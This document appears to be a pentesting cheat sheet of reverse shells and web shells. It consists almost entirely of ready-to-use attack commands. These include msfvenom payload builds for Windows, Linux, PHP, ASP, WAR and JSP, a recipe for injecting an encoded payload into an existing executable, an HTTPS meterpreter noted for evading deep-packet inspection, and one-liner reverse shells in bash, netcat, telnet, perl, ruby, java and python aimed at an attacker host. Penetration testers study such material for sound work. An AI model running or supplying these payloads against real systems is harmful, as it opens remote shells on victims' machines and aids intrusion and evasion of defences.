Reverse-shells
This is s great collection of different types of reverse shells and webshells. Many of the ones listed below comes from this cheat-sheet:
https://highon.coffee/blog/reverse-shell-cheat-sheet/
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Msfvenom
There is an important difference between non-staged and staged payload. A non-staged shell is sent over in one block. You just send shell in one stage. This can be caught with metasploit multi-handler. But also with netcat.
staged shells send them in turn. This can be useful for when you have very small buffer for your shellcode, so you need to divide up the payload. Meterpreter is a staged shell. First it sends some parts of it and sets up the connection, and then it sends some more. This can be caught with metasploit multi-handler but not with netcat.
Windows
Meterpreter
Standard meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Meterpreter HTTPS
It makes the meterpreter-traffic look normal. Since it is hidden in https the communication is encrypted and can be used to bypass deep-packet inspections.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
Non-staged payload
msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe
use exploit/multi/handler
set payload windows/shell_reverse_tcp
Staged payload
msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe
This must be caught with metasploit. It does not work with netcat.
use exploit/multi/handler
set payload windows/shell/reverse_tcp
Inject payload into binary
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe
Linux
Binary
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f elf > shell.elf
Bash
0<&196;exec 196<>/dev/tcp/192.168.1.101/80; sh <&196 >&196 2>&196
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Php
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
Netcat
Bind shell
#Linux
nc -vlp 5555 -e /bin/bash
nc 192.168.1.101 5555
# Windows
nc.exe -nlvp 4444 -e cmd.exe
Reverse shell
# Linux
nc -lvp 5555
nc 192.168.1.101 5555 -e /bin/bash
# Windows
nc -lvp 443
nc.exe 192.168.1.101 443 -e cmd.exe
With -e flag
nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
Without -e flag
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
Ncat
Ncat is a better and more modern version of netcat. One feature it has that netcat does not have is encryption. If you are on a pentestjob you might not want to communicate unencrypted.
Bind
ncat --exec cmd.exe --allow 192.168.1.101 -vnl 5555 --ssl
ncat -v 192.168.1.103 5555 --ssl
Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
Perl
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Web-shells - Platform Independent
PHP
This php-shell is OS-independent. You can use it on both Linux and Windows.
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f asp > shell.asp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f war > shell.war
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.jsp